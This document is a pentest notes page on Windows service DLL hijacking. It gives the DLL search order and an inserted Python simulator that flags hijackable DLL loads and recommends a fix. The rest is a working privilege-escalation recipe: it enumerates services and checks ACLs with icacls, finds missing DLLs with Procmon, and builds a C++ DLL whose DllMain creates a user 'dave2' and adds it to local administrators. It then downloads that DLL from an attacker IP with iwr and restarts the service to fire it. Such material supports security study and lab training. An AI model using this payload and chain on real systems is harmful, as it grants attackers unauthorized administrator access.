
# Service DLL Hijacking

Tags: Privilege Escalation, Windows Services, Windows

## Windows DLL search order

  1. The directory from which the application loaded
  2. The system directory (C:\Windows\System32)
  3. The 16-bit system directory
  4. The Windows directory
  5. The current directory
  6. Directories listed in the PATH variable
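The list above is the order Windows uses with SafeDllSearchMode enabled (the default; with it disabled the current directory moves up to second place). The following is an added example, not code from this note: it walks a DLL name through that order and reports whether a directory that ordinary users can write to is consulted before the directory that really holds the DLL, which is exactly the condition the `icacls` check below is looking for. The directory inventory, the writable-directory list and the small KnownDLLs subset are constructed for the example; real systems read KnownDLLs from `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`.

```python
"""Added example (not from the shadow.red note): simulate DLL resolution
through the SafeDllSearchMode search order and classify hijack exposure.
All paths, file inventories and ACL data below are constructed."""

SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]

# Constructed subset of the KnownDLLs list: these names are always mapped
# from the system directory and never go through the search order.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}


def norm(path):
    """Case- and trailing-backslash-insensitive key for a directory."""
    return path.rstrip("\\").lower()


def search_dirs(app_dir, cwd, path_dirs):
    """Directories in the order Windows consults them (SafeDllSearchMode on)."""
    return [app_dir, *SYSTEM_DIRS, cwd, *path_dirs]


def resolve_dll(dll_name, dirs, present):
    """Index of the first search directory that contains dll_name, else None."""
    want = dll_name.lower()
    for i, d in enumerate(dirs):
        if want in {f.lower() for f in present.get(norm(d), [])}:
            return i
    return None


def hijack_risk(dll_name, dirs, present, user_writable):
    """Classify one DLL load.

    Returns (verdict, offending_dirs):
      'missing-writable' - no copy exists and a writable directory is searched
      'shadowable'       - a copy exists but a writable directory is searched first
      'ok'               - nothing writable is consulted before the real DLL
    """
    if dll_name.lower() in KNOWN_DLLS:
        return "ok", []
    writable = {norm(d) for d in user_writable}
    idx = resolve_dll(dll_name, dirs, present)
    stop = len(dirs) if idx is None else idx
    hits = [d for d in dirs[:stop] if norm(d) in writable]
    if not hits:
        return "ok", []
    return ("missing-writable" if idx is None else "shadowable"), hits


# Constructed scenario: the service binary lives in a user-writable folder,
# the service's working directory is System32 and PATH holds only System32.
APP_DIR = r"C:\Users\dave\Documents"
PRESENT = {
    norm(r"C:\Windows\System32"): ["kernel32.dll", "version.dll"],
    norm(APP_DIR): ["BetaServ.exe"],
}
USER_WRITABLE = [APP_DIR, r"C:\Users\dave"]
DIRS = search_dirs(APP_DIR, r"C:\Windows\System32", [r"C:\Windows\System32"])


def report():
    """Verdict per DLL name for the constructed scenario."""
    return {name: hijack_risk(name, DIRS, PRESENT, USER_WRITABLE)[0]
            for name in ["kernel32.dll", "version.dll", "myDLL.dll"]}


if __name__ == "__main__":
    for name, verdict in report().items():
        print(f"{name:14} {verdict}")
```

The fix for both non-`ok` verdicts is the same: move the service binary into a directory that only administrators can write to (or tighten the ACL on the existing one), so the application directory, which is searched first, stops being attacker-controlled.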

## Identify candidate

```powershell
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls .\Documents\BetaServ.exe
```

## Use Procmon to find missing DLLs

Run `C:\tools\Procmon\Procmon64.exe`, filter on the service's process name and on `Result is NAME NOT FOUND` for paths ending in `.dll`. Restart the service so Procmon captures the DLL loads:

```powershell
Restart-Service BetaService
```

## Build a malicious DLL

```cpp
#include <stdlib.h>
#include <windows.h>

// DllMain runs when the service process loads the DLL; the payload fires on
// DLL_PROCESS_ATTACH, i.e. as soon as the hijacked load succeeds.
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            system("net user dave2 password123! /add");
            system("net localgroup administrators dave2 /add");
            break;
    }
    return TRUE;
}
```

Cross-compile it on the attacking host with mingw:

```shell
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
```

## Drop and trigger

```powershell
cd Documents
iwr -uri http://192.168.119.3/myDLL.dll -Outfile myDLL.dll
Restart-Service BetaService
net localgroup administrators
```